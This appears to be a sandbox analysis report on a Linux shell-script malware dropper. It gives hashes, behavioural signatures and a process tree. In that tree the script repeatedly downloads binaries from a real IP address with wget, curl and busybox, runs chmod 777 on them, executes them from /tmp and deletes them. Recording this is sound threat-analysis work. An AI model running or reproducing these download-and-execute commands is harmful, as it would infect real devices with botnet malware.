Analysis
-
max time kernel
71s -
max time network
76s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
-
Size
10KB
-
MD5
f9ec55ea475d5bf2658f26f7f7280c34
-
SHA1
223f1daef72dbab6429966084f88ef60a26414c0
-
SHA256
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
-
SHA512
1eed0d4a83f257ce571b39a36402dcb8f57e8472144723dddd8f818dcdc12822d4fa9b2db7082665fd82ad30ab790dd8bafa0c7932ba13c04651e782f53953aa
-
SSDEEP
192:EJ/5zEEuzm7PVm+Dgxbw4STnf777PVm+/EEuzufw4STnKjo:y/5v7PVm+DgxMv7PVm+Bo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 847 chmod 869 chmod 881 chmod 919 chmod 693 chmod 725 chmod 744 chmod 770 chmod 875 chmod 893 chmod 901 chmod 913 chmod 784 chmod 802 chmod 829 chmod 835 chmod 907 chmod 709 chmod 763 chmod 821 chmod 841 chmod 855 chmod 861 chmod 887 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ 694 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT 710 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s 726 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 746 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk 764 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m 771 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q 785 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM 803 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 822 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv 830 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj 836 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI 842 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh 849 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy 856 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 862 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk 870 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m 876 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q 882 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM 888 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv 894 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy 902 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj 908 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI 914 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh 920 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh -
Checks CPU configuration 1 TTPs 24 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk curl File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m curl File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s curl File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk curl File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM curl File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI curl File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ curl File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT curl File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q curl File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh curl File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv curl File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy curl File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh curl File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 curl File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 curl File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv curl File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI curl File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy curl File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 curl File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM curl File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj curl File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m curl File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q curl File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj curl
Processes
-
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh1⤵PID:659
-
/bin/rm/bin/rm bins.sh2⤵PID:664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:691
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:692
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:694
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:695
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:696
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:706
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:711
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:713
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:722
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:727
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:729
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:739
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:748
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:760
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:765
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:766
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:769
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:772
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:773
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:780
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:786
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:787
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:799
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:804
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:805
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:817
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:823
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:824
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:828
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:834
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:837
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:838
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:840
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:843
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:844
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:846
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:852
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:854
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:857
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:858
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:860
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:868
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:874
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:880
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:886
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:892
-
-
